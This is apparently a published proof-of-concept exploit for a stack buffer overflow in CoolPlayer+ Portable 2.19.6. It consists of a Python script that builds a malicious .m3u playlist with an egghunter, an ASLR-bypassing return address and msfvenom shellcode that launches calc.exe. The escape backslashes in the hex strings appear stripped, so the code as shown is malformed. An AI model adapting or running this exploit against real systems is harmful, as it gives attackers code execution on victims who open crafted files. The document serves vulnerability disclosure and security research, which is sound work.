CoolPlayer+ Portable 2.19.6 Stack Overflow
Posted on 26 July 2016
# Exploit Title: [CoolPlayer+ Portable build 2.19.6 - .m3u Stack Overflow [Egghunter+ASLR bypass]] # Exploit Author: [Karn Ganeshen] # Download link: [https://sourceforge.net/projects/portableapps/files/CoolPlayer%2B%20Portable/CoolPlayerPlusPortable_2.19.6.paf.exe/download?use_mirror=liquidtelecom] # Version: [Current version 2.19.6] # Tested on: [Windows Vista Ultimate SP2] # # Couple of bof exploits for older versions already on EDB: # https://www.exploit-db.com/search/?action=search&description=coolplayer #!/usr/bin/python total_buf = 2000 filename="evil.m3u" # msfvenom -p windows/exec cmd=calc.exe -b x00x0ax0c d EXITFUN=thread -f c # Payload size: 220 bytes shellcode = ("xdbxdcxd9x74x24xf4x58xbbx9axc7xdbxe9x31xc9xb1" "x31x31x58x18x83xe8xfcx03x58x8ex25x2ex15x46x2b" "xd1xe6x96x4cx5bx03xa7x4cx3fx47x97x7cx4bx05x1b" "xf6x19xbexa8x7axb6xb1x19x30xe0xfcx9ax69xd0x9f" "x18x70x05x40x21xbbx58x81x66xa6x91xd3x3fxacx04" "xc4x34xf8x94x6fx06xecx9cx8cxdex0fx8cx02x55x56" "x0exa4xbaxe2x07xbexdfxcfxdex35x2bxbbxe0x9fx62" "x44x4exdex4bxb7x8ex26x6bx28xe5x5ex88xd5xfexa4" "xf3x01x8ax3ex53xc1x2cx9bx62x06xaax68x68xe3xb8" "x37x6cxf2x6dx4cx88x7fx90x83x19x3bxb7x07x42x9f" "xd6x1ex2ex4exe6x41x91x2fx42x09x3fx3bxffx50x55" "xbax8dxeex1bxbcx8dxf0x0bxd5xbcx7bxc4xa2x40xae" "xa1x5dx0bxf3x83xf5xd2x61x96x9bxe4x5fxd4xa5x66" "x6axa4x51x76x1fxa1x1ex30xf3xdbx0fxd5xf3x48x2f" "xfcx97x0fxa3x9cx79xaax43x06x86") # Egghunter - 32 bytes eggh = ("x66x81xcaxffx0fx42x52x6a" "x02x58xcdx2ex3cx05x5ax74" "xefxb8x54x30x30x57x8bxfa" "xafx75xeaxafx75xe7xffxe7") # EIP overwrite appears to depend upon location from where the evil file is loaded from # Tested from location - C: # For e.g. offset will be different if file is loaded from C: (260) vs C:Windows (249) junk = "A"*28 eip = "xa1x99x42x00" # 0x004299a1 jmp ebx - coolplayer+.exe [noaslr,norebase,nosafeseh] evil = junk + eggh + "x90"*200 + eip + "x90"*18 + "T00WT00W" + shellcode + "x90"*1490 file = open(filename , 'w') file.write(evil) file.close()